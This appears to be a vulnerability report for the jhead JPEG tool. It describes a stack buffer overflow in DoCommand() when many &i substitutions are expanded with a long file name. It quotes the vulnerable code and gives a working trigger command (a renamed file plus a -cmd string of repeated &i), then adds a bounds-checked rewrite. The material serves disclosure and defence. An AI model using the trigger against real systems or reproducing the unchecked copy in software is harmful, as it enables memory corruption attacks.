```c
// Excerpt from DoCommand() in jhead.c (commit 0e98605). The loop substitutes
// &i / &o with the escaped file name and copies the rest of the command byte
// by byte; neither write is checked against the size of ExecString.
            // Needs an output file distinct from the input file.
            e += shellescape(ExecString + e, TempName);   // appends without knowing how much room is left
            a += 1;
            TempUsed = TRUE;
            continue;
        }
    }
    ExecString[e++] = ApplyCommand[a];   // unchecked write into the stack buffer
    if (ApplyCommand[a] == 0) break;
```
In DoCommand(), jhead calls shellescape() to copy strings to the stack buffer ExecString when it detects a &i or &o. However, jhead does not check the boundary of the stack buffer ExecString. As a result, the stack buffer will overflow when multiple &i are given.
Rename a jpeg file to a long name, such as _imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpeg

When the command contains lots of &i arguments, the stack buffer will overflow.

jhead/jhead.c, lines 389 to 406 in 0e98605
Test Environment
Ubuntu 20.04, 64 bit
jhead (master, 0e98605)
How to trigger

Renamed file: `_imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpeg`

```sh
$ jhead -cmd "&i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &p" ./_imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpeg
```
ASAN report
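As an added defensive illustration (not jhead's code): a bounds-checked version of the &i substitution loop that refuses the command when the escaped name would not fit, instead of writing past the buffer. The buffer size, the escape character set and the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed capacity of the command buffer; the real size of ExecString is not
   given on this page. */
#define EXEC_BUF 400

/* Bounded stand-in for shellescape(): appends the escaped file name at
   dst[used..] and returns the number of bytes written, or -1 if the result
   would not fit in cap bytes (including the terminating NUL). */
static int shellescape_bounded(char *dst, size_t cap, size_t used, const char *name) {
    size_t e = used;
    for (const char *p = name; *p; p++) {
        /* Constructed set of shell metacharacters that get a backslash. */
        int esc = strchr(" '\"\\$`&|;<>", *p) != NULL;
        size_t need = esc ? 2 : 1;
        if (e + need >= cap) return -1;     /* reject instead of overflowing */
        if (esc) dst[e++] = '\\';
        dst[e++] = *p;
    }
    return (int)(e - used);
}

/* Expand every "&i" in cmd with the escaped file name, mirroring the copy
   loop in DoCommand() but checking the remaining space on every write.
   Returns 0 on success, -1 if the expansion does not fit in cap bytes. */
int build_command(const char *cmd, const char *name, char *out, size_t cap) {
    size_t e = 0;
    for (size_t a = 0; ; a++) {
        if (cmd[a] == '&' && cmd[a + 1] == 'i') {
            int n = shellescape_bounded(out, cap, e, name);
            if (n < 0) return -1;
            e += (size_t)n;
            a += 1;                          /* skip the 'i' */
            continue;
        }
        if (e >= cap) return -1;             /* the write jhead leaves unchecked */
        out[e++] = cmd[a];
        if (cmd[a] == 0) return 0;
    }
}

/* 1 if cmd expanded with name fits in cap bytes, 0 otherwise. */
int fits(const char *cmd, const char *name, size_t cap) {
    char buf[EXEC_BUF];
    if (cap > sizeof buf) cap = sizeof buf;
    return build_command(cmd, name, buf, cap) == 0;
}
```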